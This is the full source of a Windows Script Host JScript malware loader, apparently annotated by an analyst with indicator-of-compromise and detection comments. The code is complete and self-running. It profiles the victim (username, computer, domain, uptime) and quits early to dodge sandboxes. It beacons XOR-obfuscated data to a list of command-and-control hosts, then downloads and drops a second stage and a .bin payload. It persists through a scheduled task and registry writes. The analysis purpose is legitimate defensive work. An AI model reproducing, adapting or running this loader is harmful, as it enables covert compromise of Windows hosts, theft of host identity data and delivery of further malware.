// Stage-1 loader configuration. Every value here is an indicator worth
// searching for on hosts and in proxy logs: the C2 host list, the build tag
// and version, the static obfuscation key and the beacon path.
var config = {
  // Candidate C2 origins, tried in order by Loader.DeployClient. Several
  // entries resemble well-known CDN/vendor hostnames (gvt1, azureedge,
  // avast); whether those are decoys or abused infrastructure cannot be
  // determined from this file -- treat the whole list as IoCs.
  PRIMARY_C2 : ['http://redirector.gvt1.com','http://onecs-live.azureedge.net','http://ipm-provider.ff.avast.com','http://tauhutxiga.com','http://monsuperentrepreneur.com','http://tangocation.com','http://e4a24fb0e.com','http://f78efaf43b.com'],
  SOFT_SIG : 'mad24',        // build/campaign tag sent in the beacon and mixed into the uid
  SOFT_VERSION: 30,          // loader version; also appended verbatim to the uid (Loader.GetUid)
  C2_REQUEST_SLEEP : 21,     // seconds slept after every C2 attempt (multiplied by 1000 in DeployClient)
  C2_FAIL_SLEEP : 21,        // not referenced anywhere in the visible code
  C2_FAIL_COUNT : 20,        // number of full passes over PRIMARY_C2 before giving up
  C2_OB_KEY : 'JxTRG4mY',    // static secret folded into every XOR key (DataTools.DeriveKey)
  C2_PREFIX : 'rpc.aspx'     // beacon path, see Loader.GetInitialEndpoint
}
// Origin used for the second-stage download (Loader.DeployHost). Defaults to
// the first list entry and is replaced by DeployClient with the host that
// actually answered.
var SELECTED_C2 = config.PRIMARY_C2[0];
// Replaces Math.imul with a 32-bit multiply implementation (used by
// DataTools.Hash). The override is unconditional: it runs even where the
// engine already provides a native Math.imul.
Math.imul = function (a, b) {
  var ah = (a >>> 16) & 0xffff;   // high 16 bits of a
  var al = a & 0xffff;            // low 16 bits of a
  var bh = (b >>> 16) & 0xffff;   // high 16 bits of b
  var bl = b & 0xffff;            // low 16 bits of b
  // cross terms shifted back up, then truncated to a signed 32-bit result
  return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
};
// Host-side artefacts: registry root, command templates, drop paths and the
// scheduled-task name. These are the most stable on-host indicators in the
// file. Only REG_ROOT, TASK_LOOP_CREATE, NTFILE_PATH, PERSIST_COMMAND and
// TASK_NAME are used by the visible code; the WMIC_*, TASK_CREATE and
// ADS_SSID entries are defined but never referenced here.
var GlobalStrings = {
  // Every Windows.RegWrite call lands under this HKCU key.
  REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
  WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
  WMIC_EXEC : "wmic process call create \"%path%\"",
  TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
  // Template expanded by Loader.Persist: a task repeating every %timeout% minutes.
  TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
  // Filler file written by Windows.CreateFile; not read back by the visible code.
  NTFILE_PATH : "C:\\Users\\Public\\prnjobs.data",
  ADS_SSID : "SyncSvc",
  // Task action: explorer.exe is handed the dropped .js (see Loader.Persist).
  PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\explorer.js",
  TASK_NAME : "PrintPool Service"
}
// Thin COM factory: symbolic keys mapped to ProgIDs, instantiated through
// ActiveXObject. This only works under Windows Script Host / JScript; the
// ProgIDs below are a useful list for script-block and AMSI telemetry.
var ObjectProducer = {}
ObjectProducer.AccesibleObjects = {
  MAIN_SH_OBJECT : 'WScript.Shell',
  STREAM_ACCESS_OBJECT : 'ADODB.Stream',
  XML_TREE_OBJECT : 'Microsoft.XMLDOM',
  XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
  HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
  FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
};
// Returns the constructor used for instantiation (ActiveXObject).
ObjectProducer.GetRootConstructor = function(){
  return ActiveXObject;
}
// Instantiates the COM object registered under instanceKey. Only
// MAIN_SH_OBJECT, FS_DRIVE_OBJECT and HTTP_CLIENT_OBJECT go through this
// factory in the visible code; the Base64/stream helpers at the bottom of
// the file create their COM objects directly.
ObjectProducer.GetInstance = function(instanceKey){
  var rootConstructor = ObjectProducer.GetRootConstructor();
  return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
}
// Obfuscation and string helpers shared by the beacon and the download path.
var DataTools = {};
DataTools.KEY_BASE = 1029;
/**
 * Derives the XOR key used by DataTools.RotString from a key string.
 * Step 1 XOR-folds every char code into KEY_BASE; step 2 sums the decimal
 * digits of that number. The result is therefore a small non-negative
 * integer (a digit sum), so RotString is light obfuscation rather than
 * encryption -- captured traffic can be decoded offline once the key
 * string (nonce + C2_OB_KEY, or uid + C2_OB_KEY) is known.
 * @param {string} keyStr  key material
 * @returns {number} digit sum of the folded value
 */
DataTools.DeriveKey = function(keyStr){
  var keyBase = DataTools.KEY_BASE;
  var key = 0;
  for(var i = 0; i < keyStr.length; i++){
    keyBase = keyBase ^ keyStr.charCodeAt(i);
  }
  // both loops share the function-scoped `i`; the second one resets it
  var _keyBase = keyBase.toString();
  for(var i = 0; i < _keyBase.length; i++){
    key += parseInt(_keyBase.charAt(i));   // single decimal digit, radix is not an issue here
  }
  return key;
}
/**
 * XORs every UTF-16 code unit of str with key. XOR is its own inverse, so
 * the same call both "encrypts" outgoing beacons (GetInitialRequest,
 * DeployHost) and decodes C2 responses (DeployClient, DeployHost).
 * @param {string} str  input text
 * @param {number} key  integer from DataTools.DeriveKey
 * @returns {string} transformed text of the same length
 */
DataTools.RotString = function(str, key){
  var rotd = "";
  for(var i = 0; i < str.length; i++){
    rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
  }
  return rotd;
}
/**
 * 32-bit multiplicative string hash (seed 0xdeadbeef, multiplier
 * 2654435761) built on the overridden Math.imul above. Used by
 * Loader.GetUid to fingerprint the host.
 * @param {string} str  text to hash
 * @returns {string} unsigned 32-bit result as unpadded lowercase hex
 */
DataTools.Hash = function(str){
  for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
    h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
  // `>>>` binds tighter than `^`: h ^ (h >>> 16), then forced unsigned
  return ((h ^ h >>> 16) >>> 0).toString(16);
}
DataTools.Random = {};
/**
 * Random integer in [min, max], both ends inclusive. Backed by Math.random,
 * i.e. not cryptographic -- relevant because the same generator produces
 * the "nonce" that seeds the beacon's XOR key.
 * @param {number} min  lower bound (ceiled)
 * @param {number} max  upper bound (floored)
 * @returns {number}
 */
DataTools.Random.Number = function(min, max){
  min = Math.ceil(min);
  max = Math.floor(max);
  return Math.floor(Math.random() * (max - min + 1)) + min;
}
/**
 * Random string of `len` lowercase ASCII letters. Used for the beacon nonce,
 * for padding query parameters, and for the 1024-character filler written
 * by Windows.CreateFile. The restricted alphabet (a-z only) is a handy
 * property when writing detections for the generated query strings.
 * @param {number} len  number of characters
 * @returns {string}
 */
DataTools.Random.String = function(len){
  var alphabet = "qwertyuiopasdfghjklzxcvbnm";
  var result = "";
  for(var i = 0; i < len; i++){
    var chr = DataTools.Random.Number(0, alphabet.length-1);
    result = result.concat(alphabet.charAt(chr));
  }
  return result;
}
DataTools.Strings = {};
/**
 * Expands %key% placeholders in str using a "key=value&key2=value2" string.
 * String.replace with a string pattern replaces only the first occurrence
 * of each placeholder. Used by Loader.Persist to build the schtasks line.
 * @param {string} str          template containing %name% tokens
 * @param {string} templateStr  ampersand-separated key=value pairs
 * @returns {string} expanded text
 */
DataTools.Strings.ParseTemplate = function(str, templateStr){
  var template = templateStr.split('&');
  for(var i = 0; i < template.length; i++){
    var keyValue = template[i].split('=');
    str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
  }
  return str;
}
// OS wrappers. Both COM objects are created at script load, so even a run
// that exits early at the uptime gate instantiates WScript.Shell and
// Scripting.FileSystemObject.
var Windows = {};
Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
// Runs a command line via WScript.Shell.Run with no window-style or wait
// arguments (WSH defaults apply). The only visible caller is Loader.Persist,
// which passes the schtasks command.
Windows.Execute = function(command){
  Windows.CoMainObject.Run(command);
}
// Expands an environment-variable reference such as "%username%".
Windows.GetEnv = function(env){
  return Windows.CoMainObject.ExpandEnvironmentStrings(env);
}
// Reads a registry value by full path (no REG_ROOT prefix, unlike RegWrite).
Windows.RegRead = function(path){
  return Windows.CoMainObject.RegRead(path);
}
// Writes a value under GlobalStrings.REG_ROOT
// (HKCU\Software\ApplicationContainer\Appsw64\). Values written by the
// visible code: ShimV4, SetupServiceKey, ServerUrl, WebLib32 -- a good
// registry-audit target.
Windows.RegWrite = function(entry, value){
  Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
}
// Creates (overwriting) a text file holding one line of 1024 random
// lowercase letters. Called once from Loader.Persist with
// GlobalStrings.NTFILE_PATH; the file is never read by the visible code,
// so its role (marker, decoy) is not determinable here.
Windows.CreateFile = function(path){
  var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
  fHandle.WriteLine(DataTools.Random.String(1024));
  fHandle.Close();
}
// Writes one line of text to "path:stream", i.e. an NTFS alternate data
// stream of `path`. Not called from the visible code (possibly used by the
// second stage; not verifiable here).
Windows.AppendDataStream = function(path, stream, data){
  var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
  fHandle.WriteLine(data);
  fHandle.Close();
}
// Saves a binary stream object (one exposing SaveToFile/Close, as returned
// by Base64bytes) into the alternate data stream "path:stream", mode 2 =
// create/overwrite. Identical to Windows.WriteDataStreamBytes below; neither
// is called from the visible code.
Windows.AppendDataStreamB = function(path, stream, data){
  data.SaveToFile(path.concat(":").concat(stream), 2);
  data.Close();
}
// Overwrites `path` with `data` as text (no trailing newline). Used by
// Loader.Persist to drop the decoded second stage at
// C:\Users\Public\explorer.js.
Windows.WriteData = function(path, data){
  var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
  fHandle.Write(data);
  fHandle.Close();
}
// Saves a binary stream object to `path` (mode 2 = create/overwrite) and
// closes it. Used by Loader.DeployHost to write %temp%\<uid>.bin.
Windows.WriteBytes = function(path, data){
  data.SaveToFile(path, 2);
  data.Close();
}
// Duplicate of Windows.AppendDataStreamB: saves a binary stream into the
// alternate data stream "path:stream". Not called from the visible code.
Windows.WriteDataStreamBytes = function(path, stream, data){
  data.SaveToFile(path.concat(":").concat(stream), 2);
  data.Close();
}
// Reads a whole text file (mode 1 = ForReading). The handle is never
// closed. Loader.Persist calls this with WScript.ScriptFullName, i.e. the
// loader reads its own source to store it in the registry.
Windows.ReadFile = function(path){
  var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
  return fHandle.ReadAll();
}
// Connects to the WMI root\cimv2 namespace on `pcname` ("." = local host)
// through the winmgmts moniker.
Windows.GetWMIProvider = function(pcname){
  return GetObject("winmgmts:"+
    "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
}
// Returns SystemUpTime (seconds since boot) from
// Win32_PerfFormattedData_PerfOS_System via WMI. Evaluated once at load
// (Loader.Uptime) and used both as a beacon field and as the early-exit
// gate in Loader.DeployClient. A script host issuing this WMI query is
// itself a reasonable telemetry signal.
Windows.GetUptime = function(){
  var wmi = Windows.GetWMIProvider(".");
  var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
  var e = new Enumerator(queryResult);
  return parseInt(e.item().SystemUpTime);
}
// Reports "64" unless the HKLM ProductName contains "Windows 7", in which
// case "32". This is an OS-name heuristic, not an actual architecture
// check; the value is sent to the C2 as the `rtag` parameter (DeployHost).
Windows.GetArch = function(){
  var architecture = "64";
  var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
  if(product.indexOf('Windows 7') != -1){
    architecture = "32";
  }
  return architecture;
}
// Single MSXML2.XMLHTTP instance reused for every request.
var Http = {};
Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
/**
 * Synchronous HTTP GET. No request headers are set by the script, so the
 * user agent is whatever MSXML2.XMLHTTP supplies. Any non-200 status and
 * any exception (DNS failure, connection refused, ...) are collapsed into
 * an empty string, which callers treat as "no payload".
 * @param {string} url  absolute URL
 * @returns {string} response body, or "" on any failure
 */
Http.Request = function(url){
  try{
    Http.Client.Open('GET', url, false);   // false = synchronous
    Http.Client.Send();
    if(Http.Client.Status == 200)
      return Http.Client.ResponseText;
    else
      return "";
  }catch(e){
    return ""
  }
}
// Host profile collected at load time and sent in the first beacon.
var Loader = {};
Loader.USERNAME = Windows.GetEnv("%username%");
Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
Loader.Uptime = Windows.GetUptime();   // WMI query happens here, before any network activity
// "true" when USERDOMAIN differs from COMPUTERNAME. On a workgroup machine
// USERDOMAIN is normally the computer name, so this presumably flags
// domain-joined hosts -- the code itself only compares the two strings.
Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
/**
 * Host identifier: DataTools.Hash over username, computer name, domain,
 * MachineType, version and build tag, with SOFT_VERSION then appended as a
 * string (Hash returns a string, so `+ 30` concatenates "30"). The uid is
 * stable per host/version and is also stored in the registry as
 * SetupServiceKey, so it can be recovered from an infected machine and used
 * to decode the DeployHost exchange (key = uid + C2_OB_KEY).
 * @returns {string}
 */
Loader.GetUid = function(){
  return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
}
/**
 * Builds the encoded beacon body: the profile fields joined with ":",
 * XORed with DeriveKey(nonce + C2_OB_KEY), base64-encoded, then
 * URL-encoded. Because the nonce travels in the clear in the same URL
 * (the `ubwG` parameter, see GetInitialEndpoint) and C2_OB_KEY is a
 * constant in this file, a captured beacon can be fully decoded offline.
 * @param {string} nonce  random string from GetInitialEndpoint
 * @returns {string} URL-safe encoded payload
 */
Loader.GetInitialRequest = function(nonce){
  var uid = Loader.GetUid();
  var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
  var sessionKey = nonce + config.C2_OB_KEY;
  request = request.join(":");
  request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
  request = Base64Encode(request);
  return encodeURIComponent(request);
}
/**
 * Builds the beacon path: "/rpc.aspx?ctl=KeepAlive..." with the encoded
 * profile, two random padding parameters (forcedRedirect, header) and the
 * nonce (ubwG). The fixed "ctl=KeepAlive" and the a-z-only padding values
 * are the stable parts to key proxy detections on.
 * NOTE(review): the "®clid=" fragment below is almost certainly the HTML
 * entity "&reg" rendered by the hosting page, i.e. the original source
 * presumably reads "&regclid=" -- confirm against the raw file before
 * using this string in a signature.
 * @returns {string} path and query, without the origin
 */
Loader.GetInitialEndpoint = function(){
  var nonce = DataTools.Random.String(12)
  var request = Loader.GetInitialRequest(nonce);
  var endpoint = "/" + config.C2_PREFIX + "?ctl=KeepAlive®clid=" + request + "&forcedRedirect=" + DataTools.Random.String(12) + "&header=" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
  return endpoint;
}
/**
 * Second download: GET <SELECTED_C2>/go.aspx with the uid (XORed with
 * DeriveKey(nonce + C2_OB_KEY), base64, URL-encoded), the nonce (TS2) and
 * the GetArch value (rtag). The response is XOR-decoded with
 * DeriveKey(uid + C2_OB_KEY), base64-decoded to bytes and written to
 * %temp%\<uid>.bin. The file is only written here, not executed; what
 * consumes it is outside this file. An empty response (Http.Request
 * failure) still results in a (near-empty) .bin being written.
 * @returns {string} full path of the dropped file
 */
Loader.DeployHost = function(){
  var temp = Windows.GetEnv("%temp%");
  var architecture = Windows.GetArch();
  var nonce = DataTools.Random.String(12);
  var uid = Loader.GetUid();
  var sessionKey = nonce + config.C2_OB_KEY;
  var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
  encodedId = Base64Encode(encodedId);
  encodedId = encodeURIComponent(encodedId);
  var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture);
  // response key is uid-based, not nonce-based
  pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
  var filename = uid.concat(".bin");
  Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
  return temp.concat("\\").concat(filename);
}
/**
 * Entry point of the loader (called at the bottom of the file).
 * 1. Exits immediately if the host has been up for 3000 s (50 min) or
 *    less -- consistent with sandbox/analysis-VM avoidance, though the code
 *    only encodes the threshold.
 * 2. Up to C2_FAIL_COUNT (20) passes over PRIMARY_C2 (8 hosts), sleeping
 *    C2_REQUEST_SLEEP (21 s) after every single attempt: worst case
 *    160 requests over roughly 56 minutes.
 * 3. The response is XOR-decoded with DeriveKey(uid + C2_OB_KEY); a body
 *    starting with the marker "<<<CLIENT__" carries the base64 second
 *    stage. The winning C2 and the uid are stored in the registry
 *    (ShimV4, SetupServiceKey), SELECTED_C2 is updated, and Persist runs.
 * All exceptions inside an attempt are swallowed, so a failure on one host
 * just moves on to the next.
 */
Loader.DeployClient = function() {
  if (Loader.Uptime <= 3000) {
    WScript.Quit(0);
  }
  for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
    for (var j = 0; j < config.PRIMARY_C2.length; j++) {
      try {
        var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
        response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
        if (response.indexOf('<<<CLIENT__') !== -1) {
          var client = response.replace('<<<CLIENT__', '');
          client = Base64text(client);
          Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
          Windows.RegWrite("SetupServiceKey", Loader.GetUid());
          SELECTED_C2 = config.PRIMARY_C2[j];
          Loader.Persist(client);
          return;
        }
      } catch (e) {
        // deliberately ignored: try the next host
      }
      // sleep sits inside the inner loop, i.e. after every host, not per pass
      WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
    }
  }
}
/**
 * Persistence and staging. Observable artefacts, in order:
 *  - schtasks /Create of "PrintPool Service", repeating every 6 minutes,
 *    action "explorer.exe C:\Users\Public\explorer.js" (explorer is
 *    presumably used so the .js opens via its registered handler; the
 *    code itself only launches the command line).
 *  - HKCU\...\Appsw64\ServerUrl  = the decoded second-stage text (despite
 *    the name, this value holds script text, not a URL).
 *  - HKCU\...\Appsw64\WebLib32   = the full source of this loader.
 *  - C:\Users\Public\prnjobs.data = 1024 random letters.
 *  - C:\Users\Public\explorer.js  = the decoded second stage.
 * Finally DeployHost fetches the .bin payload into %temp%.
 * @param {string} client  decoded second-stage script text
 */
Loader.Persist = function(client){
  var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
  var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
  Windows.Execute(taskCommand);
  Windows.RegWrite("ServerUrl", client);
  Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
  Windows.CreateFile(GlobalStrings.NTFILE_PATH);
  Windows.WriteData("C:\\Users\\Public\\explorer.js", client);
  Loader.DeployHost();
}
// Developer leftover: shows a WScript.Shell popup. Not called from the
// visible code.
function debug(message){
  ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
}
/**
 * Decodes base64 to UTF-8 text using the MSXML "bin.base64" typed-value
 * trick and an ADODB.Stream round trip (binary in, text out). The stream is
 * never closed. Note the COM objects are created directly here rather than
 * through ObjectProducer.
 * @param {string} string  base64 text
 * @returns {string} decoded text
 */
function Base64text(string){
  var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
  var element = XmlDOM.createElement("tempContainer");
  element.dataType = "bin.Base64";
  element.text = string;
  var stream = WScript.CreateObject("ADODB.Stream");
  stream.Type = 1;              // binary
  stream.Open();
  stream.Write(element.nodeTypedValue);
  stream.Position = 0;
  stream.Type = 2;              // switch to text to read it back
  stream.CharSet = "utf-8";
  return stream.ReadText();
}
/**
 * Converts a JScript string to a byte array via an ADODB.Stream written as
 * text with CharSet "ascii" and read back as binary. Characters outside
 * ASCII are therefore subject to that charset conversion (exact behaviour
 * is ADO's, not visible here). The stream is never closed.
 * @param {string} string  text to convert
 * @returns {*} binary (byte array) value from Stream.Read
 */
function StringToBinary(string){
  var BinaryStream = new ActiveXObject("ADODB.Stream");
  BinaryStream.Type = 2;        // text
  BinaryStream.CharSet = "ascii";
  BinaryStream.Open();
  BinaryStream.WriteText(string);
  BinaryStream.Position = 0;
  BinaryStream.Type = 1;        // binary
  BinaryStream.Position = 0;
  return BinaryStream.Read();
}
/**
 * Decodes base64 into an open binary ADODB.Stream and returns the stream
 * itself; the caller (Windows.WriteBytes / the *DataStream* helpers) is
 * responsible for SaveToFile and Close.
 * @param {string} string  base64 text
 * @returns {*} open ADODB.Stream positioned after the written bytes
 */
function Base64bytes(string){
  var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
  var element = XmlDOM.createElement("Base64Data");
  element.dataType = "bin.base64";
  element.text = string;
  var stream = WScript.CreateObject("ADODB.Stream");
  stream.Type = 1;              // binary
  stream.Open();
  stream.Write(element.nodeTypedValue);
  return stream;
}
/**
 * Base64-encodes a string (bytes from StringToBinary, encoding by the
 * MSXML typed value). The output has all newlines removed and, in
 * addition, every "//" sequence removed -- keep that in mind when decoding
 * captured beacons, since "//" is a legal base64 digit pair and the server
 * side must be tolerating its absence.
 * @param {string} string  text to encode
 * @returns {string} base64 text without newlines or "//"
 */
function Base64Encode(string) {
  var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
  var element = XmlDOM.createElement("Base64Data");
  element.dataType = "bin.base64";
  element.nodeTypedValue = StringToBinary(string);
  return element.text.replace(/\n/g, "").replace(/\/\//g, "");
}
// Auto-run guard: the loader only starts when CLIENT_IMPORT_ENV is not
// defined. Presumably the second stage defines that symbol before pulling
// this file in so it can reuse the helpers above without re-running the
// beacon -- not verifiable from this file alone.
if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
  Loader.DeployClient();
}